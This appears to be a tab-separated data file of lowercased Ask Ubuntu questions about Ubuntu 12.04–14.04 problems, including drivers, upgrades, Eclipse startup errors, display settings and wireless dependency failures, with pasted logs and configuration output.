456446	lenovo z510 working extremely slow on battery	ubuntu 12.04 on lenovo z510 i5 . when ac power adapter is plugged in , everything is fine , the system is working fast . when i unplug the ac adapter , ubuntu is going to work extremely slow . i understand that this is powersave issue , but nothing helps . tried laptop-mode-tools , cpufreqd , indicator-power . also tried to change parameters in power.d also , i understand that maximum performance affects battery-life , but i do n't care about that . i need a full performance even on battery . any ideas ? thank you .
456451	can i upgrade mailman to the latest release via apt-get ?	i 'm running mailman 2.1.16rc2 on ubuntu 12.04 . that 's the most recent version available via apt-get install . mailman recently released version 2.1.18 with some new features to deal with fallout from yahoo 's new dmarc policy for email . is there any way to install this latest version via apt-get ? i 'd like to continue using apt-get updates to find new versions of mailman in the future , but the version i want is not currently available in the standard repositories .
456452	ubuntu 14.04 , how to set middle mouse emulation ? ( no taps , real buttons )	i looked for the topic , but i only find information on how to have middle click emulation ( wheel click ) using taps with n fingers . i want to have the emulation with the real buttons under the trackpads and mice connected through usb . for this topic , i saw adding the flag in /etc/x11/xorg.conf , but it does seem to not exist / have moved in ubuntu 12.04
456453	realtek rtl8188ce wireless driver unstable in ubuntu 14.04	since a fresh install of ubuntu 14.04 i 'm loosing internet connection after a few minutes . i comes back after reboot or wakeup from standby . that seems to be a known issue with the realtek rtl8188ce wireless driver . the same worked perfect with ubuntu 12.04 . here are the details : uname -a linux annika-notebook 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux lspci -nnk | grep -i net -a2 07:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec:9181 ] kernel driver in use : rtl8192ce 08:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8151 v2.0 gigabit ethernet [ 1969:1083 ] ( rev c0 ) subsystem : quanta computer inc device [ 152d:0872 ] kernel driver in use : atl1c cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 annika-notebook # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters ifconfig -a eth0 link encap : ethernet hardware adresse e8:9a:8f : ca:6d:92 up broadcast multicast mtu:1500 metrik:1 rx-pakete:0 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:0 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:0 ( 0.0 b ) tx-bytes:0 ( 0.0 b ) lo link encap : lokale schleife inet adresse:127.0.0.1 maske:255.0.0.0 inet6-adresse : : :1/128 gültigkeitsbereich : maschine up loopback running mtu:65536 metrik:1 rx-pakete:11699 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:11699 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:0 rx-bytes:8044499 ( 8.0 mb ) tx-bytes:8044499 ( 8.0 mb ) wlan0 link encap : ethernet hardware adresse 9c : b7:0d:33 : fa : cd inet adresse:192.168.1.37 bcast:192.168.1.255 maske:255.255.255.0 inet6-adresse : fe80 : :9eb7 : dff : fe33 : facd/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx-pakete:351596 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:216953 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:498072663 ( 498.0 mb ) tx-bytes:23696977 ( 23.6 mb ) wlan0 ieee 802.11bgn essid : '' unten '' mode : managed frequency:2.462 ghz access point : 00:0f:66 : e9 : d0 : a7 bit rate=18 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=60/70 signal level=-50 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:135 missed beacon:0 wlan0 ieee 802.11bgn essid : '' unten '' mode : managed frequency:2.462 ghz access point : 00:0f:66 : e9 : d0 : a7 bit rate=18 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=60/70 signal level=-50 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:135 missed beacon:0 route -n kernel-ip-routentabelle ziel router genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 cat /var/lib/networkmanager/networkmanager.state [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true cat /etc/networkmanager/networkmanager.conf [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # pci device 0x1969:0x1083 ( atl1c ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' e8:9a:8f : ca:6d:92 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' cat /etc/udev/rules.d/70-persistent-net.rules | egrep -i 'device|sub ' -a3 # pci device 0x1969:0x1083 ( atl1c ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' e8:9a:8f : ca:6d:92 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x10ec:0x8176 ( rtl8192ce ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 9c : b7:0d:33 : fa : cd '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 ''
456457	which features i can use while testing ubuntu ?	which features i can use while testing ubuntu ( without installing ) ? i mean am i allowed to install third party softwares while testing it from a livecd or liveusb ? plz answer .
456461	ubuntu booting error , stopped at loading ubuntu image	i have installed ubuntu latest version and i 've been using the same installation for the two last months . but suddenly two days back looks like it had crashed and after restarting it 's not booting correctly . it gets stuck at the ubuntu loading screen . ( the logo ) i am getting the below error for almost 5 min and then got stuck : read fpdma queued i have taken backup using an usb stick . could you please help me resolving the error above ? i had no luck figuring it out myself . thanks in advance .
456467	how to get rid of the keyboard layout menu without getting rid of keyboard layout	i have a uk keyboard . it works . but in the top right corner of my gnome shell screen i have a little `` en1â '' menu which offers me a choice of uk or us keyboards . as i have no plans to move across the ocean , being constantly offered a foreign keyboard layout is not useful ; it is screen junk . so i went to keyboard layouts and removed the us layout , leaving just the uk one . the menu disappeared - great ... but turns out that now it thought my keyboard had gone all american - press # and i 'd get \ ! enable the us keyboard , and it goes uk again ( ! ) . it 's only annoying , but wondering if anyone can fix ? edit : screenshots added : gnome 's system settings : region & language
456468	eclipse stopped working with ubuntu upgrade to 14.04	two days ago i upgraded to the latest ubuntu 14.04 . everything was working fine , until i tried to open eclipse that i use for java development . it shows the loading window but the program never loads . i started eclipse from command line : eclipse -consolelog i receive the following output : ! session 2014-04-27 17:57:42.917 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=debbuild java.version=1.7.0_51 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86 , ws=gtk , nl=en_us command-line arguments : -os linux -ws gtk -arch x86 -consolelog ! entry org.eclipse.ui 4 0 2014-04-27 17:57:49.167 ! message unable to create editor id org.eclipse.jdt.ui.compilationuniteditor : no editor descriptor for id org.eclipse.jdt.ui.compilationuniteditor ! stack 1 org.eclipse.ui.partinitexception : no editor descriptor for id org.eclipse.jdt.ui.compilationuniteditor at org.eclipse.ui.internal.editorreference.createparthelper ( editorreference.java:601 ) at org.eclipse.ui.internal.editorreference.createpart ( editorreference.java:465 ) at org.eclipse.ui.internal.workbenchpartreference.getpart ( workbenchpartreference.java:595 ) at org.eclipse.ui.internal.editorareahelper.setvisibleeditor ( editorareahelper.java:271 ) at org.eclipse.ui.internal.editormanager.setvisibleeditor ( editormanager.java:1459 ) at org.eclipse.ui.internal.editormanager $ 5.runwithexception ( editormanager.java:972 ) at org.eclipse.ui.internal.startupthreading $ startuprunnable.run ( startupthreading.java:31 ) at org.eclipse.swt.widgets.runnablelock.run ( runnablelock.java:35 ) at org.eclipse.swt.widgets.synchronizer.runasyncmessages ( synchronizer.java:135 ) at org.eclipse.swt.widgets.display.runasyncmessages ( display.java:3537 ) at org.eclipse.swt.widgets.display.readanddispatch ( display.java:3189 ) at org.eclipse.ui.application.workbenchadvisor.openwindows ( workbenchadvisor.java:803 ) at org.eclipse.ui.internal.workbench $ 33.runwithexception ( workbench.java:1600 ) at org.eclipse.ui.internal.startupthreading $ startuprunnable.run ( startupthreading.java:31 ) at org.eclipse.swt.widgets.runnablelock.run ( runnablelock.java:35 ) at org.eclipse.swt.widgets.synchronizer.runasyncmessages ( synchronizer.java:135 ) at org.eclipse.swt.widgets.display.runasyncmessages ( display.java:3537 ) at org.eclipse.swt.widgets.display.readanddispatch ( display.java:3189 ) at org.eclipse.ui.internal.workbench.runui ( workbench.java:2609 ) at org.eclipse.ui.internal.workbench.access $ 4 ( workbench.java:2499 ) at org.eclipse.ui.internal.workbench $ 7.run ( workbench.java:679 ) at org.eclipse.core.databinding.observable.realm.runwithdefault ( realm.java:332 ) at org.eclipse.ui.internal.workbench.createandrunworkbench ( workbench.java:668 ) at org.eclipse.ui.platformui.createandrunworkbench ( platformui.java:149 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:124 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:353 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:180 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:629 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:584 ) at org.eclipse.equinox.launcher.main.run ( main.java:1438 ) ! subentry 1 org.eclipse.ui 4 0 2014-04-27 17:57:49.174 ! message no editor descriptor for id org.eclipse.jdt.ui.compilationuniteditor ! entry org.eclipse.ui 2 2 2014-04-27 17:57:49.416 ! message ignored attempt to add saveable that was already registered ! stack 0 org.eclipse.core.runtime.assertionfailedexception : unknown saveable : org.eclipse.ui.internal.defaultsaveable @ 13b2f29 from part : org.eclipse.ui.internal.erroreditorpart @ 13b2f29 at org.eclipse.ui.internal.saveableslist.logwarning ( saveableslist.java:187 ) at org.eclipse.ui.internal.saveableslist.addmodel ( saveableslist.java:116 ) at org.eclipse.ui.internal.saveableslist.addmodels ( saveableslist.java:289 ) at org.eclipse.ui.internal.saveableslist.postopen ( saveableslist.java:695 ) at org.eclipse.ui.internal.partlist.partopened ( partlist.java:234 ) at org.eclipse.ui.internal.partlist.access $ 0 ( partlist.java:210 ) at org.eclipse.ui.internal.partlist $ 1.propertychanged ( partlist.java:40 ) at org.eclipse.ui.internal.workbenchpartreference.fireinternalpropertychange ( workbenchpartreference.java:375 ) at org.eclipse.ui.internal.workbenchpartreference.getpart ( workbenchpartreference.java:610 ) at org.eclipse.ui.internal.editorareahelper.setvisibleeditor ( editorareahelper.java:271 ) at org.eclipse.ui.internal.editormanager.setvisibleeditor ( editormanager.java:1459 ) at org.eclipse.ui.internal.editormanager $ 5.runwithexception ( editormanager.java:972 ) at org.eclipse.ui.internal.startupthreading $ startuprunnable.run ( startupthreading.java:31 ) at org.eclipse.swt.widgets.runnablelock.run ( runnablelock.java:35 ) at org.eclipse.swt.widgets.synchronizer.runasyncmessages ( synchronizer.java:135 ) at org.eclipse.swt.widgets.display.runasyncmessages ( display.java:3537 ) at org.eclipse.swt.widgets.display.readanddispatch ( display.java:3189 ) at org.eclipse.ui.application.workbenchadvisor.openwindows ( workbenchadvisor.java:803 ) at org.eclipse.ui.internal.workbench $ 33.runwithexception ( workbench.java:1600 ) at org.eclipse.ui.internal.startupthreading $ startuprunnable.run ( startupthreading.java:31 ) at org.eclipse.swt.widgets.runnablelock.run ( runnablelock.java:35 ) at org.eclipse.swt.widgets.synchronizer.runasyncmessages ( synchronizer.java:135 ) at org.eclipse.swt.widgets.display.runasyncmessages ( display.java:3537 ) at org.eclipse.swt.widgets.display.readanddispatch ( display.java:3189 ) at org.eclipse.ui.internal.workbench.runui ( workbench.java:2609 ) at org.eclipse.ui.internal.workbench.access $ 4 ( workbench.java:2499 ) at org.eclipse.ui.internal.workbench $ 7.run ( workbench.java:679 ) at org.eclipse.core.databinding.observable.realm.runwithdefault ( realm.java:332 ) at org.eclipse.ui.internal.workbench.createandrunworkbench ( workbench.java:668 ) at org.eclipse.ui.platformui.createandrunworkbench ( platformui.java:149 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:124 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:353 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:180 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:629 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:584 ) at org.eclipse.equinox.launcher.main.run ( main.java:1438 ) ! entry org.eclipse.ui 4 4 2014-04-27 17:57:49.586 ! message could not create view : 'org.eclipse.jdt.ui.javadocview ' . ! entry org.eclipse.ui 4 4 2014-04-27 17:57:49.589 ! message could not create view : 'org.eclipse.jdt.ui.sourceview ' . ! entry org.eclipse.ui 2 2 2014-04-27 17:57:49.851 ! message perspective java has been made into a local copy the past two days i was searching the internet and the farthest i could reach was ; deleting the `` workspace '' folder makes eclipse starts but without any projects , plugins or settings . any idea how to resolve this issue ? thanks in advance .
456469	printer samsung ml 1670 driverproblem and missing rastertosplc	i 'm not that experienced in solving problems myself when it comes to ubuntu , and i am not really experienced using the terminal . my problem is that a few days ago i reinstalled ubuntu 13.10 and updated it to 14.04 . since then i have n't been able to use my laserprinter ( samsung ml 1670 ) . thanks to other threads with similar problems i can get so far that just the rastertosplc seems to be missing . and thats about it . is there anyone who knows what i should do now ?
456470	ca n't save nvidia settings for screens after reboot	i have two screens and sometimes i just want the 27 '' to display . so far i have tried to run the nvidia-settings as sudo -s nvidia-settings but every time i reboot i have to redo my preferences.. my laptop is asus g75vw nvidia driver version is : 331.38 ubuntu 14.04 i have tried with new drivers , nothing changed exept now the standard settings make the screen duplicate ... is there any alternative simple way i can set settings to persists after reboot ? the x configuratior file # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 337.12 ( buildd @ charichuelo ) wed apr 9 12:25:02 utc 2014 # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 331.38 ( buildmeister @ swio-display-x64-rhel04-15 ) wed jan 8 19:53:14 pst 2014 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` samsung s27c590 '' horizsync 30.0 - 81.0 vertrefresh 50.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 670m '' option `` registrydwords '' `` powermizerenable=0x1 ; perflevelsrc=0x3322 ; powermizerdefault=0x2 ; powermizerdefaultac=0x2 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-2 '' option `` metamodes '' `` hdmi-0 : nvidia-auto-select +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection xrand gives me $ sudo xrandr screen 0 : minimum 8 x 8 , current 3840 x 1080 , maximum 16384 x 16384 vga-0 disconnected ( normal left inverted right x axis y axis ) lvds-0 connected 1920x1080+1920+0 ( normal left inverted right x axis y axis ) 382mm x 215mm 1920x1080 60.0*+ 40.0 dp-0 disconnected ( normal left inverted right x axis y axis ) hd mi-0 connected primary 1920x1080+0+0 ( normal left inverted right x axis y axis ) 598mm x 336mm 1920x1080 60.0*+ 59.9 50.0 1680x1050 60.0 1600x900 60.0 1440x900 59.9 1280x1024 75.0 60.0 1280x800 59.8 1280x720 60.0 59.9 50.0 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 720x576 50.0 720x480 59.9 640x480 75.0 72.8 59.9 dp-1 disconnected ( normal left inverted right x axis y axis )
456471	changing wine dlls overrides configuration from terminal	well , i have a problem with two wine programs . one of the need a dll with a `` ( native , builtin ) '' configuration and the other with any configuration but that one . so my question is that is there a way to overwrite or change from the terminal ( to put it on a script ) that configuration ?
456473	gnome flashback metacity , what is the correct way to start applications ?	in gnome flashback metacity , what is the correct way to start applications ? i tried using gnome-tweak-tool and going to startup applications , but i can only choose between the applications in the list . i want to add a custom script . if i try to type ( as in nautiulus , when you can change dir by symply typing ) it does not work .
456475	upgrade server from 12.04 to 14.04 ?	maybe i 'm searching for the wrong words but i cant find a list of commands needed to do this . any help would be really appreciated . thank you .
456481	how can i get my vpn to autoconnect at startup ?	i have a lubuntu 14.04 virtual machine , and it has a working vpn connection . however , i have to manually turn the vpn on every time . in the network manager 's wired cnnection 1 settings , there is an option to autostart the vpn connection : however , if i select this option , the network disconnects and wo n't come back unless i deselect this option . how do i get my vpn connection to start when i log in ?
456483	mesa 10.1.0 ubuntu studio 14.04 lts no opengl 3.3	i have installed ubuntu studio 14.04 lately , i am learning modern opengl , when i use glsl with # version 330 core shader program send error that only opengl up to 130 is supported but seems mesa can run gl 3.3 , also from info of my pc with kde info and glxinfo both says opengl 3.0 , i wonder why ! i have amd ati hd 5450 and this is output of glxinfo opengl vendor string : x.org opengl renderer string : gallium 0.4 on amd cedar opengl core profile version string : 3.3 ( core profile ) mesa 10.1.0 opengl core profile shading language version string : 3.30 opengl core profile context flags : ( none ) opengl core profile profile mask : core profile opengl core profile extensions : opengl version string : 3.0 mesa 10.1.0 opengl shading language version string : 1.30 opengl context flags : ( none ) opengl extensions : i am using glfw for window and glew for gl .
456486	upgraded ubuntu but xubuntu-desktop did not upgrade	i had ubuntu 12.10 installed along with lubuntu and xubuntu desktop environments . i upgraded to ubuntu 14.04 using a bootable usb ( loaded with ubuntu , not xubuntu nor lubuntu ) but i see no change in the desktop environment when i log in to xubuntu , and comparing to the screenshots of xubuntu 14.04 i can see that xubuntu does not seem to have been upgraded . i tried sudo apt-get remove xubuntu-desktop to try to reinstall but this did not removed xubuntu-desktop , as i am still able to log in . how can i make sure that xubuntu has been upgraded to version 14.04 ?
456491	what are the different ubuntu cloud guest images ( -disk1 , -root , -uefi1 ) ?	on the daily build page on cloud-images.ubuntu.com , there are a number of different images published for each architecture , for example : trusty-server-cloudimg-amd64-disk1.img trusty-server-cloudimg-amd64-root.tar.gz trusty-server-cloudimg-amd64-uefi1.img trusty-server-cloudimg-amd64.tar.gz what is the difference between these different releases ? the best documentation i can find is this wiki page , but it does n't seem to answer the question .
456492	ubuntu overheats after starting from hibernation , but not after restarting	i have a dell inspiron laptop with ubuntu 13.10 64 bit recently i have upgraded to 13.10 from 13.04 and noticed that laptop is overheating ( psensor temp ~80 ) . but after i restart , temperature returns to normal ( psensor ~56 ) so i guess this has to do something with hibernation , because laptop doesnt heat if i do proper shutdown every time . any ideas how to fix this ? i also checked startup applications , nothing unusual app found . also i have tlp installed , thought that it will help , but it didnt !
456494	ubuntu 14.04 windows transparency	i 've searched alot but did n't find anywhere , i loved my windows transparency in ubuntu 13.10 ( that you could enable by opening dconf editor going to org > compiz > gwd ) and it does n't seem to work now in ubuntu 14.04 is there another way to make my windows borders transparent ? ( like that gedit border http : //www.techsupportalert.com/files/images/aero-glass-effect-200-151.png )
456495	how to free space for an upgrade	i tried to update my ubuntu but i get a message that says i do n't have enough disk space . the updater says that i need about 450 mbs of disk space although i have many gbs available in both of my partitions . what could be wrong ?
456496	sapphire r7 250 driver for ubuntu 14.04 lts	i have spent the last few hours searching and trying to install a driver for my sapphire r7 250x gpu . perhaps i am going about it the wrong way and i may just need to understand how to install drivers for ubuntu . my computer hardware : mb : msi 970a-g46 cpu : amd fx 8320 gpu : sapphire r7 250 ram : adata ddr3 8gb 1800 ssd : adata sp900 just to help any confusion on the gpu here is the webpage : http : //www.sapphiretech.com/presentation/product/ ? cid=1 & gid=3 & sgid=1226 & pid=2028 & psn= & lid=1 & leg=0
456497	firefox spellcheck keeps changing dictionary to es_cu even after i changed to en_us in about : config	running ubuntu 14.04 , but happened with 13.10 too . also tried disabling language add-ons but no es_cu is there anyway . the about : config change works until i restart .
456498	how can i change the regular ctrl commands to accept super instead ?	macintosh , i 've discovered , has the right idea in that they use the apple key instead of ctrl in the copy , paste , select all , etc commands . this is extremely useful in the terminal , where ctrl-c is already predefined to be stop , but where i also need to copy and paste text . is there a way to switch all the normal gui shortcuts to super instead of ctrl ?
456501	conky theme error when window maximize	when i run a conky theme it start normally and after maximizing document/window or any file theme look like a mess . theme do n't display any errors on terminal . can anyone help me .
456502	what application is used to open link for installation ?	please forgive my ignorance but i am a ubuntu novice , to say the very least . my question involves downloading and installing . by way of example , i was on this page : https : //apps.ubuntu.com/cat/applications/browser-plugin-gnash/ i attempted to download by selecting the red button which brought up a dialogue box which read `` this link needs to be opened with an application . '' then it asks me to choose an application . i select choose and several selections appear but i do not know what they are or what is their function . could someone please explain to me what application is utilized for this purpose and how to find it . i attempted to find the `` software center '' thinking that might be a good application to download a plugin but the `` software center '' was no where to be found in the list of available options . thank you in advance for your answer .
456504	coreutils is needed by wireless driver ?	i have a hp probook 4540s running on ubuntu 14.04 lts 64bit , and now i am trying to install some drivers that i really need for my laptop . however , it keeps telling me that : error : failed dependencies : coreutils is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 grep is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 iwlwifi-firmware > = 18.168.6.1 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 /bin/sh is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_sched ) = 99b9b2cee8d5c184 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : fs_sysfs_symlink ) = 05e36cb11924889a is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : vmlinux ) = 78ddd7e8714ce712 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : vmlinux ) = d85b26d970125f4f is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_core_dev ) = 8dc062599ae835b5 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : lib_hexdump ) = a2e3db6622115725 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_timer ) = 423e9e985483e429 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_mutex ) = a661ac933270637f is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_core_skbuff ) = 7f7f9e5fa3210795 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_pci_pci ) = 965c068edd7a10b2 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_panic ) = 7737fe7a37eaa833 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : fs_read_write ) = ef6f1645c76018dc is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_core_netpoll ) = e4c55efba5bb1d00 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_base_core ) = 031f0243be730c4d is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : fs_debugfs_debugfs ) = fc955f60bf6fd86f is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : arch_x86_kernel_x8664_ksyms_64 ) = 2af1e5a3b31ce371 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_usb_core_usbcore ) = a31ee4646e95cefe is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_usb_core_usbcore ) = ee8389eaec92ebff is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_trace_trace_events ) = 5f7a3cec79fff7b8 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : mm_slab ) = 4bd7c3a2c0675e16 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_leds_led-triggers ) = 151b1112bc734a77 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : mm_mempolicy ) = a21071c0f03a8aa0 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_workqueue ) = 10aa4ba7134a4c59 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_workqueue ) = 935a39c08f5e6a71 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_base_dd ) = 2786158e436e8831 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_printk ) = 9cc1b39ddf89e9f5 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : lib_iomap ) = 75d64c88e44b0fef is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_pci_msi ) = d2e961d091937246 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_pci_access ) = 07e5c2882c8b5920 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_time ) = 3973ba83d487721d is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_rfkill_rfkill ) = 7e64ddd0c68a4839 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_trace_trace ) = af6ba76b79fad5dd is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_netlink_genetlink ) = 6db50e399620e9c6 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_events_core ) = b8fa3728d1e8d6cc is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_ipv4_devinet ) = 8458260d3842d1fc is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_core_dev_addr_lists ) = b07542d56101ef93 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_params ) = 7af15e23aeb0c96a is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_leds_led-class ) = 5108c727a0b22335 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_softirq ) = 7eb84c8543fc95bc is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_time_timekeeping ) = 80d2df62da4c5dfe is needed by 